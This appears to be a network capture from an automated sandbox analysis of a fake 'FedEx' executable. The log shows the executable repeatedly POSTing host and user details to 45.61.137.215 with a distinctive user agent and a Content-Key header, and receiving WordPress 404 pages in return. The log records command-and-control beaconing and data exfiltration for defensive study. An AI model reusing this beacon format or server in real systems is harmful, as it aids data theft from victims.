May 22, 2024 22:02:06.609208107 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:06.612574100 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:06.612612963 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:06.619216919 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:06.621898890 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:06.621936083 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:02:06.621967077 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:06.627296925 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49719	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:06.757642984 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:06.808172941 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:10.515069962 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:10.516139030 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:10.518595934 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:10.521087885 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:10.521102905 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:10.526042938 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:10.528512955 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:10.528528929 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:02:10.533463955 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:02:10.535226107 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49720	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:10.745955944 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:10.796333075 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:13.850891113 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:13.851608038 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:13.853466988 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:13.855431080 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:13.855468035 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:13.859215021 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:13.861181974 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:13.861219883 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:02:13.861251116 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:13.865400076 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49721	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:14.011874914 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:14.060195923 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:17.059880972 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:14 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
